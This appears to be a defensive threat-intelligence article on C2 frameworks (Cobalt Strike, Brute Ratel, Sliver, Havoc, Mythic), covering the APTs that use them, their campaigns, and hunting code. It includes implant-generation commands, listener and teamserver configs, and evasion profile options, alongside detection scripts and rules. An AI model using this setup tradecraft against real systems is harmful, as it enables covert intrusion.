C2 Frameworks: The Threat Actor's Arsenal

Deep dive into Command and Control frameworks used by nation-state actors and cybercriminals—Cobalt Strike, Brute Ratel, Sliver, Havoc, and Mythic with real APT attribution and detection strategies.

Command and Control frameworks have evolved from simple RATs to sophisticated platforms that blur the line between legitimate red team tools and nation-state weapons. This deep dive examines the most prevalent C2 frameworks, the threat actors wielding them, and the detection strategies that can expose their presence.

Disclaimer: This article is intended for defensive security professionals, threat hunters, and researchers. Understanding attacker tools and techniques is essential for building effective defenses. All information is sourced from public threat intelligence reports and security research.

The Evolution of Command and Control

The landscape of Command and Control (C2) frameworks has undergone a dramatic transformation over the past decade. What began as simple remote access trojans (RATs) with basic capabilities has evolved into sophisticated, modular platforms that rival enterprise software in their complexity and feature sets.

Modern C2 frameworks provide threat actors with:

  • Encrypted communications that blend with legitimate traffic
  • Modular payload systems for on-demand capability deployment
  • Evasion techniques to bypass EDR and antivirus solutions
  • Malleable profiles that mimic legitimate applications
  • Cross-platform agents targeting Windows, Linux, and macOS
  • Peer-to-peer capabilities for resilient networks

A brief timeline:

  • 2012: Cobalt Strike released as a commercial adversary simulation tool
  • 2019: Sliver published as an open-source framework by Bishop Fox
  • 2020: Brute Ratel C4 enters the market as a detection-evasion focused framework
  • 2022: Havoc framework released, offering a modern UI and extensibility
  • 2024: Operation Morpheus takes down 593 IP addresses hosting unlicensed Cobalt Strike
  • 2025-2026: Threat actors increasingly adopt Sliver, Havoc, and Mythic as Cobalt Strike detection improves

Cobalt Strike: The Industry Standard

Cobalt Strike remains the most widely used C2 framework in both legitimate red team operations and malicious campaigns. Originally developed by Raphael Mudge and now owned by Fortra (formerly HelpSystems), it has become the de facto standard against which all other C2 frameworks are measured.

Technical Architecture

Cobalt Strike operates on a team server model where multiple operators can collaborate on engagements. The Beacon payload communicates with the team server using configurable protocols:

# Malleable C2 Profile Example - Mimicking jQuery
http-get {
    set uri "/jquery-3.3.1.min.js";

    client {
        header "Accept" "text/html,application/xhtml+xml";
        header "Accept-Language" "en-US,en;q=0.5";

        metadata {
            base64url;
            prepend "__cfduid=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/javascript";
        header "Cache-Control" "max-age=0, no-cache";

        output {
            mask;
            base64url;
            prepend "/*! jQuery v3.3.1 */";
            append "/*! END */";
            print;
        }
    }
}
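To make the transform chains in that profile concrete, here is an added Python model (it is not Cobalt Strike code and not part of the original page) that applies the client metadata transforms and the server output transforms exactly as the profile orders them, then inverts them, which is what a defender does when recovering Beacon traffic from a capture once the profile is known. The `mask` step is modelled as Malleable C2 documents it, a random 4-byte XOR key prepended to the data; the metadata and task bytes are constructed placeholders, and the `looks_like_profile_output` check is my own heuristic, not a vendor rule.

```python
import base64
import os
import re

# Transform-chain constants taken from the jQuery profile above
COOKIE_PREFIX = "__cfduid="
OUTPUT_PREPEND = "/*! jQuery v3.3.1 */"
OUTPUT_APPEND = "/*! END */"


def b64url_encode(data: bytes) -> str:
    # Malleable C2's base64url emits no '=' padding
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mask(data: bytes, key: bytes = b"") -> bytes:
    """'mask' transform: XOR with a random 4-byte key, key prepended to the output."""
    key = key or os.urandom(4)
    return key + bytes(b ^ key[i % 4] for i, b in enumerate(data))


def unmask(data: bytes) -> bytes:
    key, body = data[:4], data[4:]
    return bytes(b ^ key[i % 4] for i, b in enumerate(body))


def encode_client_metadata(metadata: bytes) -> dict:
    """client { metadata { base64url; prepend "__cfduid="; header "Cookie"; } }"""
    return {
        "Accept": "text/html,application/xhtml+xml",
        "Accept-Language": "en-US,en;q=0.5",
        "Cookie": COOKIE_PREFIX + b64url_encode(metadata),
    }


def decode_client_metadata(headers: dict) -> bytes:
    cookie = headers.get("Cookie", "")
    if not cookie.startswith(COOKIE_PREFIX):
        raise ValueError("Cookie does not carry profile metadata")
    return b64url_decode(cookie[len(COOKIE_PREFIX):])


def encode_server_output(task: bytes, key: bytes = b"") -> str:
    """server { output { mask; base64url; prepend ...; append ...; print; } }"""
    return OUTPUT_PREPEND + b64url_encode(mask(task, key)) + OUTPUT_APPEND


def decode_server_output(body: str) -> bytes:
    """Inverse chain: strip append/prepend, base64url-decode, unmask."""
    if not (body.startswith(OUTPUT_PREPEND) and body.endswith(OUTPUT_APPEND)):
        raise ValueError("body does not match the profile framing")
    inner = body[len(OUTPUT_PREPEND):len(body) - len(OUTPUT_APPEND)]
    return unmask(b64url_decode(inner))


def looks_like_profile_output(body: str) -> bool:
    """Hunting check for the inconsistency this profile leaves on the wire.

    Real jQuery 3.3.1 continues '/*! jQuery v3.3.1 | (c) JS Foundation ...' and is
    tens of kilobytes of JavaScript; a Beacon task under this profile is one
    base64url token wrapped by the fixed prepend/append strings, and unpadded
    base64 never has a length of 1 mod 4.
    """
    pattern = re.escape(OUTPUT_PREPEND) + r"([A-Za-z0-9_-]+)" + re.escape(OUTPUT_APPEND)
    m = re.fullmatch(pattern, body)
    return m is not None and len(m.group(1)) % 4 != 1


if __name__ == "__main__":
    metadata = b"\x00\x00\xbe\xef" + b"constructed beacon metadata"  # constructed placeholder
    print(encode_client_metadata(metadata)["Cookie"])
    body = encode_server_output(bytes(range(32)))
    print(body, decode_server_output(body) == bytes(range(32)))
```

Run against a captured response body, `decode_server_output` yields the masked task bytes that Beacon would have consumed; the framing check alone is enough to pivot on because the genuine CDN response never matches the regular expression.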

Key Capabilities

  • Beacon payload: Asynchronous or interactive sessions with configurable sleep times
  • Malleable C2: Traffic profiles that mimic legitimate applications
  • BOF (Beacon Object Files): In-memory execution of compiled C code
  • SOCKS proxy: Pivoting through compromised hosts
  • Mimikatz integration: Credential harvesting and Kerberos attacks
  • Lateral movement: PsExec, WMI, WinRM, and SSH execution

Threat Actors Using Cobalt Strike

  • APT41 (Double Dragon/Winnti): Chinese state-sponsored group targeting healthcare, telecom, and technology sectors. Known for combining espionage with financially motivated operations. Uses Cobalt Strike alongside custom malware like ShadowPad.
  • Mango Sandstorm (MERCURY/MuddyWater): Iranian MOIS-linked APT targeting Middle Eastern telecommunications and government entities. Deploys Cobalt Strike after initial access via spear-phishing. (Microsoft's Lemon Sandstorm name belongs to a different Iranian group, Fox Kitten/Pioneer Kitten.)
  • RedNovember: China-nexus group tracked by Recorded Future's Insikt Group. Exploits internet-facing appliances for initial access, then deploys the Go-based Pantegana backdoor and Cobalt Strike against government, defense, and aerospace targets in several regions.
  • Grayling: Suspected Chinese APT discovered by Symantec in 2023 targeting Taiwan, Vietnam, the Pacific Islands, and US biomedical organizations. Combines Cobalt Strike with Havoc for redundancy.
  • FIN7: Financially motivated group that the US Department of Justice holds responsible for over $1 billion in losses. Uses Cobalt Strike as its primary post-exploitation framework, including in ransomware operations.
  • Conti/Royal/BlackSuit: Major ransomware operations extensively using cracked Cobalt Strike versions.

Notable Campaigns

APT41 Healthcare Targeting (2024-2025)

APT41 conducted extensive campaigns against healthcare organizations worldwide, leveraging Cobalt Strike Beacons deployed through compromised Citrix and Pulse Secure VPN appliances. The group used custom Malleable C2 profiles mimicking Microsoft Azure traffic to evade detection. Post-compromise activity included deployment of custom ShadowPad variants for long-term persistence.

Operation Morpheus (June 2024)

In a landmark law enforcement action led by the UK's National Crime Agency and coordinated by Europol, 593 IP addresses hosting unlicensed Cobalt Strike across 27 countries were flagged to hosting providers and taken down during the week of 24 to 28 June 2024. Agencies from Australia, Canada, Germany, the Netherlands, Poland, and the US took part; the targeted servers were cracked Cobalt Strike installations used in ransomware and espionage campaigns.

Detection Strategies

  • JA3/JA3S fingerprinting: the TLS fingerprints of Beacon's default client and of the Java-based team server are well documented, but JA3 collides with any client that shares the same TLS stack, so treat a hit as a pivot and pair it with the server-side JA3S
  • HTTP header analysis: Malleable profiles often have subtle inconsistencies (a jQuery URI that returns a few hundred bytes, headers the real CDN would set but the profile omits, fixed prepend/append strings around a base64 token)
  • Named pipe monitoring: default pipes such as \\.\pipe\MSSE-####-server (stager), \\.\pipe\postex_#### (post-exploitation jobs) and \\.\pipe\msagent_## (SMB Beacon), unless the profile overrides them
  • Memory scanning: Beacon's reflective loader and its XOR-encoded configuration block have stable signatures
  • Sleep mask detection: the sleep mask obfuscates Beacon's image between callbacks, so scan at the moment of wake-up or look for executable regions whose contents flip between encrypted and plaintext
  • YARA rules: extensive public rulesets are available, including the open-source set published by Google Cloud Threat Intelligence and community collections

MITRE ATT&CK mapping

  ID          Technique                   Cobalt Strike implementation
  T1055       Process Injection           Beacon spawns sacrificial processes for post-exploitation jobs
  T1071.001   Web Protocols               HTTP/HTTPS C2 with Malleable profiles
  T1059.001   PowerShell                  PowerShell stagers and post-exploitation
  T1003       OS Credential Dumping       Integrated Mimikatz (LSASS) and DCSync (T1003.006)
  T1558.003   Kerberoasting               Service ticket requests, typically via execute-assembly (Rubeus)
  T1021.002   SMB/Windows Admin Shares    PsExec-style service creation for lateral movement
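The pipe names and ATT&CK rows above translate directly into a hunt. The following Python script is an added example (not page code and not any vendor's rule) that runs Cobalt Strike's documented default pipe names over Sysmon pipe-creation events (Event ID 17) and, separately, flags pipes created by images that legitimately never create pipes, which catches operators who renamed their pipes in the profile. The events are constructed JSON lines, and `SUSPICIOUS_CREATORS` is my own starting list rather than an authoritative one.

```python
import json
import re
from typing import List, Optional

# Default pipe names documented for Cobalt Strike; '#' positions are digits or hex
DEFAULT_CS_PIPES = [
    (re.compile(r"^\\MSSE-\d{3,4}-server$", re.I), "Cobalt Strike stager default pipe"),
    (re.compile(r"^\\postex_[0-9a-f]{4}$", re.I), "Cobalt Strike post-exploitation job pipe (4.2+)"),
    (re.compile(r"^\\msagent_[0-9a-f]{2}$", re.I), "Cobalt Strike SMB Beacon default pipe"),
    (re.compile(r"^\\status_[0-9a-f]{2}$", re.I), "Cobalt Strike SMB Beacon pipe (pre-4.x)"),
]

# Common spawnto/injection targets that have no business creating named pipes (assumed list)
SUSPICIOUS_CREATORS = {"rundll32.exe", "regsvr32.exe", "gpupdate.exe", "werfault.exe"}

# Constructed Sysmon events exported as JSON, not real telemetry.
# Chrome's mojo.* pipes are included as a benign decoy: they are a known false positive.
SAMPLE_EVENTS = [
    r'{"EventID": 17, "UtcTime": "2025-01-10 10:00:01", "Image": "C:\\Windows\\System32\\svchost.exe", "PipeName": "\\wkssvc"}',
    r'{"EventID": 17, "UtcTime": "2025-01-10 10:00:07", "Image": "C:\\Windows\\System32\\rundll32.exe", "PipeName": "\\msagent_5f"}',
    r'{"EventID": 17, "UtcTime": "2025-01-10 10:00:09", "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe", "PipeName": "\\MSSE-4213-server"}',
    r'{"EventID": 18, "UtcTime": "2025-01-10 10:00:10", "Image": "C:\\Windows\\System32\\rundll32.exe", "PipeName": "\\msagent_5f"}',
    r'{"EventID": 17, "UtcTime": "2025-01-10 10:00:12", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "PipeName": "\\mojo.5688.8052.12345"}',
    r'{"EventID": 17, "UtcTime": "2025-01-10 10:00:20", "Image": "C:\\Windows\\System32\\rundll32.exe", "PipeName": "\\ntsvcs_1a"}',
]


def classify(event: dict) -> Optional[str]:
    """Return a reason string if the pipe-creation event is suspicious, else None."""
    if event.get("EventID") != 17:  # 17 = PipeCreated; 18 = PipeConnected is ignored here
        return None
    pipe = event.get("PipeName", "")
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    for pattern, label in DEFAULT_CS_PIPES:
        if pattern.match(pipe):
            return label
    if image in SUSPICIOUS_CREATORS:
        return f"pipe created by {image}, which normally creates none (renamed pipe?)"
    return None


def hunt(lines: List[str]) -> List[dict]:
    """Run every JSON event through classify() and collect the hits in log order."""
    findings = []
    for line in lines:
        event = json.loads(line)
        reason = classify(event)
        if reason:
            findings.append({"time": event["UtcTime"], "image": event["Image"],
                             "pipe": event["PipeName"], "reason": reason})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['time']}  {f['pipe']:<20} {f['image']}  ->  {f['reason']}")
```

The second check is the one that survives a customised profile: a pipe named `\ntsvcs_1a` looks plausible on its own, but `rundll32.exe` creating it is not.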

Brute Ratel C4: The Detection Evasion Specialist

Brute Ratel C4 (BRc4) emerged in 2020 as a commercial adversary simulation tool explicitly designed to evade modern EDR solutions. Created by Chetan Nayak (Paranoid Ninja), a former red team operator at Mandiant and CrowdStrike, BRc4 incorporates lessons learned from years of offensive operations against enterprise security stacks.

Technical Differentiators

BRc4's architecture prioritizes stealth over features:

# Brute Ratel badger profile (illustrative; key names are paraphrased, not BRc4's exact schema)
{
  "sleep": 60,
  "jitter": 50,
  "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
  "hosts": ["cdn.example.com:443", "api.example.com:443"],
  "rotation": "round-robin",
  "proxy_aware": true,
  "syscall_mode": "indirect",
  "etw_bypass": true,
  "amsi_bypass": true
}

Key Capabilities

  • Badger payload: Lightweight agent with built-in EDR evasion
  • Indirect syscalls: resolves system call numbers itself and jumps to the syscall instruction inside ntdll.dll instead of calling a hooked API export, defeating userland hooks while keeping a plausible ntdll return address on the stack
  • ETW patching: Disables Event Tracing for Windows to blind security tools
  • AMSI bypass: Neutralizes Antimalware Scan Interface
  • SMB/TCP pivoting: Agent chaining through internal networks
  • LDAP querying: Built-in Active Directory reconnaissance
  • Custom DoH/DoT: DNS-over-HTTPS/TLS for covert channels

Threat Actors Using Brute Ratel C4

  • Patchwork APT (Dropping Elephant): Indian state-aligned group that HarfangLab observed deploying BRc4 against Bhutanese government entities in 2024. Used spear-phishing with diplomatic lures to deliver badger payloads, one of the first documented APT uses of BRc4.
  • LUNAR SPIDER: Financially motivated operator of the IcedID and Latrodectus loaders (the Storm-0978 name sometimes attached to it actually belongs to RomCom). EclecticIQ documented LUNAR SPIDER in 2024 combining Latrodectus with BRc4 badgers, delivered through SEO-poisoned tax-themed lures, against financial services organizations as a ransomware precursor.
  • Black Basta: Ransomware group that integrated BRc4 into its toolkit in 2022 after Cobalt Strike detections improved, staging BRc4 through Qakbot infections before deploying ransomware.
  • Cracked builds: a BRc4 1.2.2 build leaked in late 2022 and circulates in criminal channels, and Unit 42 had already reported a 2022 sample whose tradecraft resembled APT29. Leaked builds, not licensed copies, account for most malicious BRc4 sightings.

The Patchwork Campaign Against Bhutan (2024)

In one of the most significant documented uses of BRc4 by an APT, the Patchwork group targeted Bhutanese government entities with sophisticated spear-phishing campaigns. The attack chain demonstrated the evolution of nation-state tradecraft:

  1. Initial Access: Spear-phishing emails with diplomatic-themed lures delivering a ZIP archive that contains a Windows shortcut (LNK) file
  2. Execution: The shortcut retrieves a decoy PDF together with a legitimate signed executable and a malicious DLL; the BRc4 badger is loaded through DLL side-loading
  3. Persistence: Scheduled tasks and registry run keys
  4. C2: HTTPS communications to attacker-controlled infrastructure mimicking CDN providers
  5. Collection: Document exfiltration and credential harvesting

Key Insight: The Patchwork campaign marked a significant shift in APT tooling. Previously, Patchwork relied on custom malware like BADNEWS and Ragnatela. The adoption of BRc4 suggests nation-state actors are increasingly adopting commercial red team tools to accelerate operations and complicate attribution.

LUNAR SPIDER and the Ransomware Economy

LUNAR SPIDER represents the intersection of initial access brokers and ransomware operations. Their use of BRc4 demonstrates the tool's appeal to financially motivated actors:

# Typical LUNAR SPIDER attack flow
1. Initial Access: IcedID/Latrodectus phishing campaign
2. Foothold: BRc4 badger deployment via Latrodectus loader
3. Discovery: LDAP queries, network enumeration
4. Lateral Movement: SMB/WMI with harvested credentials
5. Data Staging: Archive creation on file shares
6. Exfiltration: HTTPS to attacker infrastructure
7. Impact: Ransomware deployment (often BlackCat/ALPHV)

Detection Strategies

  • Call-stack and syscall telemetry: a system call whose return address is not inside ntdll.dll, or whose call stack lacks the kernel32/kernelbase frames a normal API call would carry, betrays direct and indirect syscalls; kernel-side sources (ETW Threat Intelligence, object and registry callbacks) are unaffected by user-mode patching
  • Memory analysis: Badger's in-memory structures have identifiable patterns
  • Network indicators: default DoH resolvers and certificate patterns
  • ETW tampering: check ntdll's ETW entry points in each process for patches (for example EtwEventWrite rewritten to return immediately) and monitor for provider modifications
  • Behavioral analysis: injection patterns, process hollowing sequences

Sliver: The Open-Source Alternative

Sliver, developed by Bishop Fox, has emerged as the leading open-source alternative to commercial C2 frameworks. Its GPLv3 license, active development, and extensive documentation have made it increasingly popular with both red teams and threat actors seeking to avoid the scrutiny associated with Cobalt Strike.

Architecture Overview

# Sliver implant generation
sliver > generate --mtls 192.168.1.100 --os windows --arch amd64 --format exe --save implant.exe

# HTTP C2 with custom headers
sliver > https --domain cdn.example.com --lport 443 \
         --cert /path/to/cert.pem --key /path/to/key.pem

# mTLS listener for encrypted communications
sliver > mtls --lhost 0.0.0.0 --lport 8888

Key Capabilities

  • Multi-protocol C2: mTLS, HTTP(S), DNS, WireGuard, and named pipes
  • Cross-platform: Windows, Linux, macOS implant generation
  • Dynamic code execution: In-memory .NET assembly and BOF execution
  • Armory: Extension marketplace with community-contributed modules
  • Multiplayer: multi-operator mode in which each operator authenticates to the server with an individual mTLS certificate
  • Stager payloads: Shellcode and staged implant delivery
  • Traffic encryption: Asymmetric key exchange with per-session encryption

Threat Actors Using Sliver

  • TA551 (Shathak): Prolific initial access broker that Proofpoint observed delivering Sliver as early as late 2021, alongside its traditional IcedID payloads. Targets English, German, Italian, and Japanese-speaking organizations.
  • APT29 (Cozy Bear): Russian SVR-linked group that the UK NCSC reported in 2020 using Sliver alongside its custom WellMess and WellMail malware in COVID-19 vaccine research targeting.
  • DEV-0569 (now Storm-0569): Microsoft-tracked actor using Sliver in ransomware precursor activities, often delivered via malvertising campaigns.
  • Multiple Ransomware Affiliates: Various groups have adopted Sliver as Cobalt Strike alternatives, including affiliates of BlackCat, LockBit, and Royal.

The Sliver Adoption Wave

Microsoft's threat intelligence team reported in 2022 that Sliver had been adopted by nation-state actors and by cybercrime groups that directly support ransomware operations, and vendor reporting since then shows continued growth. The surge is attributed to several factors:

  • Improved Cobalt Strike detection: Years of defensive research have made Cobalt Strike increasingly difficult to use covertly
  • Open-source availability: No licensing costs or cracked version risks
  • Active development: Regular updates adding new evasion capabilities
  • Documentation quality: Comprehensive guides lower the barrier to entry

Detection Strategies

  • Certificate analysis: listener certificates are self-signed by default unless the operator supplies their own or enables Let's Encrypt, so check subject and issuer fields and validity periods
  • DNS tunneling: long encoded subdomain labels and high query volumes to a single domain in DNS C2 mode
  • HTTP indicators: default URI patterns and header configurations
  • Process behavior: implant injection and execution patterns
  • Network signatures: mTLS on the default port 8888 and the TLS client fingerprints of Go binaries

Havoc: The Modern Framework

Havoc emerged in 2022 as a modern C2 framework with a focus on user experience and extensibility. Developed by C5pider, it combines the flexibility of open-source with advanced evasion capabilities typically found in commercial tools.

Technical Features

# Havoc Demon (implant) capabilities
- Sleep obfuscation with custom techniques
- Indirect syscalls via Hell's Gate/Halo's Gate
- AMSI/ETW/WLDP bypass options
- Custom reflective loader
- Extensible via Python/C BOFs

# Teamserver profile (Havoc uses an HCL-style .yaotl file, not YAML)
Teamserver {
    Host = "0.0.0.0"
    Port = 40056
}

Operators {
    user "operator1" {
        Password = "Password123!"
    }
}

Listeners {
    Http {
        Name      = "https-listener"
        Hosts     = ["192.168.1.100"]
        HostBind  = "0.0.0.0"
        PortBind  = 443
        PortConn  = 443
        Secure    = true
        UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
        Uris      = ["/index.php"]
    }
}

Key Capabilities

  • Demon payload: Feature-rich implant with extensive evasion
  • Modern UI: Qt-based cross-platform interface
  • Python API: Scriptable automation and integration
  • Sleep techniques: Ekko, Zilean, and custom sleep obfuscation
  • Token manipulation: Advanced impersonation capabilities
  • Inline execution: Execute assemblies and BOFs in implant process

Threat Actors Using Havoc

  • Grayling APT: Suspected Chinese group targeting Taiwan, Vietnam, and US biomedical sectors. Combines Havoc with Cobalt Strike for redundant C2 channels.
  • In-the-wild campaigns: Zscaler ThreatLabz and ReversingLabs documented Havoc Demon delivered through a typosquatted npm package in early 2023, among the first public sightings of Havoc outside red teams; Fortinet's FortiGuard Labs reported a 2025 ClickFix phishing campaign staging a modified Havoc Demon through SharePoint and the Microsoft Graph API.
  • Various Ransomware Affiliates: Increasing adoption among groups seeking alternatives to detected Cobalt Strike infrastructure.

The Grayling Campaign

Symantec's 2023 discovery of the Grayling APT revealed a sophisticated operation using Havoc alongside traditional tools. The campaign targeted organizations in Taiwan, Vietnam, the United States, and a government agency in the Pacific Islands, with manufacturing, IT, and biomedical firms among the victims:

Attack Chain

  1. Initial access: not confirmed; Symantec assessed exploitation of public-facing infrastructure as the likely vector
  2. DLL side-loading to run shellcode that loads the Havoc Demon as the primary C2
  3. Cobalt Strike Beacon as a backup channel
  4. Local privilege escalation with a public exploit for a Windows kernel bug, then credential harvesting with Mimikatz and network reconnaissance
  5. Intelligence collection against the targeted sectors

Detection Strategies

  • Sleep obfuscation patterns: Ekko/Zilean leave identifiable memory artifacts
  • Shellcode characteristics: Demon loader has consistent patterns
  • Network behavior: Default profile HTTP patterns
  • Process hollowing: Demon's injection technique signatures

Mythic: The Modular Platform

Mythic represents a different approach to C2 frameworks, functioning as a platform that supports multiple payload types through a modular agent architecture. Developed by Cody Thomas (its_a_feature_), Mythic's flexibility has attracted both sophisticated red teams and threat actors.

Architecture

# Mythic supports multiple agent types:
# - Athena (.NET cross-platform)
# - Apollo (Windows)
# - Poseidon (Golang cross-platform)
# - Medusa (Python)
# - Merlin (Golang)

# Agent installation
./mythic-cli install github https://github.com/MythicAgents/apollo

# C2 Profile installation
./mythic-cli install github https://github.com/MythicC2Profiles/http

Key Capabilities

  • Multi-agent architecture: Support for diverse payload types
  • Custom C2 profiles: Pluggable communication protocols
  • Web UI: Modern React-based interface
  • Reporting: Built-in operation documentation
  • Artifact tracking: Automatic IOC collection
  • MITRE mapping: Automatic ATT&CK technique tagging

Threat Actors Using Mythic

  • Documented intrusions: Kaspersky has described Mythic-based agents in targeted attacks on Russian organizations, first a privately developed Loki agent in 2024 and later a modified Merlin agent used by the cluster it calls Mythic Likho.
  • Limited attribution elsewhere: because agents and C2 profiles are open source and easily modified, samples rarely carry a distinctive watermark; some initial access brokers have advertised Mythic in underground forums as an alternative to Cobalt Strike.

Framework Comparison

  Feature              Cobalt Strike   Brute Ratel     Sliver          Havoc           Mythic
  License              Commercial      Commercial      Open source     Open source     Open source
  Primary payload      Beacon          Badger          Implant         Demon           Multi-agent
  EDR evasion          Moderate        High            Moderate        High            Varies by agent
  Cross-platform       Limited         Windows focus   Excellent       Windows focus   Excellent
  Documentation        Extensive       Good            Excellent       Good            Excellent
  Community            Large           Small           Growing         Growing         Moderate
  Threat actor usage   Extensive       Increasing      Increasing      Moderate        Limited

Emerging Threats and Trends

The Shift Away from Cobalt Strike

The 2024-2025 period has marked a significant shift in threat actor tooling preferences. Several factors drive this transition:

  • Operation Morpheus impact: the takedown of 593 IP addresses demonstrated the risks of relying on well-known infrastructure
  • Improved detection: Years of research have made default Cobalt Strike configurations detectable by most EDR solutions
  • Licensing crackdowns: Fortra's legal actions against cracked versions have reduced availability
  • Alternative maturity: Sliver, Havoc, and BRc4 have reached feature parity for most operations

Custom Framework Development

Advanced threat actors are increasingly developing custom C2 frameworks to avoid detection signatures entirely. Notable examples include:

  • ShadowPad: modular backdoor shared among Chinese state-sponsored groups and used alongside public tools
  • Sunburst: the SolarWinds backdoor demonstrated nation-state capability for custom development, including C2 disguised as the product's own telemetry
  • Industroyer2: Sandworm's purpose-built ICS payload is the extreme end of this trend; it has no C2 at all and carries its IEC-104 targets in an embedded configuration, so nothing beacons out to detect

AI-Assisted Evasion

Emerging research suggests threat actors are exploring AI-assisted techniques for:

  • Automated malleable profile generation to mimic legitimate traffic
  • Dynamic payload modification to evade static signatures
  • Behavioral analysis evasion through adaptive sleep patterns

Detection and Hunting Strategies

Network-Based Detection

# Sigma rule for known C2 JA3 fingerprints (feed the hash list from maintained threat intelligence)
title: Potential C2 Framework JA3 Fingerprint
status: experimental
description: >
    Matches TLS client fingerprints attributed to Cobalt Strike Beacon. JA3 collides across
    clients that share a TLS stack, so treat a hit as a pivot and pair it with the server's JA3S.
    Go-based implants such as Sliver have no single fingerprint; their JA3 changes with the Go version.
logsource:
    category: proxy   # any source that records the ClientHello JA3 (Zeek ssl.log, Suricata tls, proxy)
detection:
    selection:
        ja3_hash:
            - '72a589da586844d7f0818ce684948eea'  # widely reported Cobalt Strike Beacon fingerprint
    condition: selection
falsepositives:
    - Legitimate software sharing the same TLS stack and cipher ordering
level: medium

Endpoint Detection

# YARA rule for Beacon configuration headers and out-of-place syscall stubs in process memory
rule C2_Memory_Pattern {
    meta:
        description = "Cobalt Strike Beacon config header and syscall stubs outside ntdll in process memory"
        author = "Brickell Technologies"
    strings:
        // Beacon config begins 00 01 00 01 00 02 (index 1, type short, length 2),
        // XOR-encoded with 0x69 (Beacon 3.x) or 0x2E (Beacon 4.x)
        $cs_config_v3 = { 69 68 69 68 69 6B }
        $cs_config_v4 = { 2E 2F 2E 2F 2E 2C }
        // mov r10,rcx ; mov eax,<ssn> ; syscall ; ret: normal inside ntdll,
        // suspicious in a private region that is not ntdll (direct/indirect syscall stubs)
        $syscall_stub = { 4C 8B D1 B8 ?? ?? 00 00 0F 05 C3 }
        $ntdll_name = "ntdll.dll" ascii nocase
    condition:
        any of ($cs_config_*) or ($syscall_stub and not $ntdll_name)
}
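Finding the configuration header is only the first half of the memory-scanning strategy described above; the second half is decoding the block so the C2 server, sleep and jitter fall out for pivoting. The Python below is an added example, not page code and not the output of any published parser, though it follows the record layout those parsers document: records of `index:u16 type:u16 length:u16 data` XOR-encoded with a single byte (0x2E for Beacon 4.x, 0x69 for 3.x), starting with index 1 (BeaconType) and ending at index 0; type 1 is a 16-bit integer, type 2 a 32-bit integer, type 3 raw bytes. The "memory dump" is constructed here, with only a handful of settings populated, and the setting-name table is a subset of the public one.

```python
import struct
from typing import Dict, Optional, Tuple

XOR_KEYS = (0x2E, 0x69)                        # Beacon 4.x, Beacon 3.x
CONFIG_HEADER = bytes.fromhex("000100010002")  # index 1 (BeaconType), type 1 (u16), length 2

# Subset of the publicly documented Beacon setting table (index -> name)
SETTING_NAMES = {1: "BeaconType", 2: "Port", 3: "SleepTime", 4: "MaxGetSize", 5: "Jitter",
                 7: "PublicKey", 8: "C2Server", 9: "UserAgent", 10: "HttpPostUri",
                 14: "SpawnTo", 15: "PipeName", 37: "Watermark"}
BEACON_TYPES = {0: "HTTP", 1: "Hybrid HTTP/DNS", 2: "SMB", 4: "TCP", 8: "HTTPS", 16: "Bind TCP"}


def find_config(dump: bytes) -> Optional[Tuple[int, int]]:
    """Return (offset, xor_key) of the first encoded config header, trying both known keys."""
    for key in XOR_KEYS:
        needle = bytes(b ^ key for b in CONFIG_HEADER)
        off = dump.find(needle)
        if off != -1:
            return off, key
    return None


def parse_config(dump: bytes, offset: int, key: int, max_records: int = 128) -> Dict[str, object]:
    """Walk 'index:u16 type:u16 length:u16 data' records until index 0 or end of data."""
    cfg: Dict[str, object] = {}
    pos = offset
    for _ in range(max_records):
        if pos + 6 > len(dump):
            break
        index, kind, length = struct.unpack(">HHH", bytes(b ^ key for b in dump[pos:pos + 6]))
        if index == 0:
            break
        data = bytes(b ^ key for b in dump[pos + 6:pos + 6 + length])
        pos += 6 + length
        if kind == 1 and length == 2:
            value: object = struct.unpack(">H", data)[0]
        elif kind == 2 and length == 4:
            value = struct.unpack(">I", data)[0]
        else:  # type 3: fixed-width, zero-padded bytes; show as text when printable
            stripped = data.rstrip(b"\x00")
            printable = bool(stripped) and all(32 <= b < 127 for b in stripped)
            value = stripped.decode("ascii") if printable else stripped.hex()
        name = SETTING_NAMES.get(index, f"setting_{index}")
        if name == "BeaconType":
            value = BEACON_TYPES.get(value, f"unknown({value})")
        cfg[name] = value
    return cfg


def extract_beacon_config(dump: bytes) -> Optional[Dict[str, object]]:
    hit = find_config(dump)
    return None if hit is None else parse_config(dump, *hit)


def _record(index: int, kind: int, data: bytes, width: int = 0) -> bytes:
    """Build one plaintext config record; type-3 fields are zero-padded to a fixed width."""
    data = data.ljust(width, b"\x00") if width else data
    return struct.pack(">HHH", index, kind, len(data)) + data


def build_sample_dump(key: int = 0x2E) -> bytes:
    """Constructed 'memory dump': filler, an XOR-encoded config, more filler. Not a real Beacon."""
    plain = (
        _record(1, 1, struct.pack(">H", 8))        # BeaconType = HTTPS
        + _record(2, 1, struct.pack(">H", 443))    # Port
        + _record(3, 2, struct.pack(">I", 60000))  # SleepTime in milliseconds
        + _record(5, 1, struct.pack(">H", 50))     # Jitter percent
        + _record(8, 3, b"cdn.example.com,/jquery-3.3.1.min.js", 256)
        + _record(15, 3, b"\\\\.\\pipe\\msagent_5f", 128)
        + b"\x00" * 6                               # terminator record (index 0)
    )
    encoded = bytes(b ^ key for b in plain)
    return b"\x90" * 512 + encoded + b"\x90" * 512


if __name__ == "__main__":
    for k, v in (extract_beacon_config(build_sample_dump()) or {}).items():
        print(f"{k:<12} {v}")
```

The same six-byte header search is what the YARA rule above performs; once it hits, `parse_config` recovers `C2Server` (host and GET URI) and `PipeName`, which feed straight into the network and named-pipe hunts.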

Behavioral Indicators

  • Process injection patterns: CreateRemoteThread, QueueUserAPC, NtMapViewOfSection
  • Unusual parent-child relationships: Word/Excel spawning cmd.exe/powershell.exe
  • Named pipe creation: Monitor for non-standard pipe names
  • Sleep patterns: Regular beacon intervals with consistent jitter
  • Credential access: LSASS access, DCSync traffic, Kerberoasting
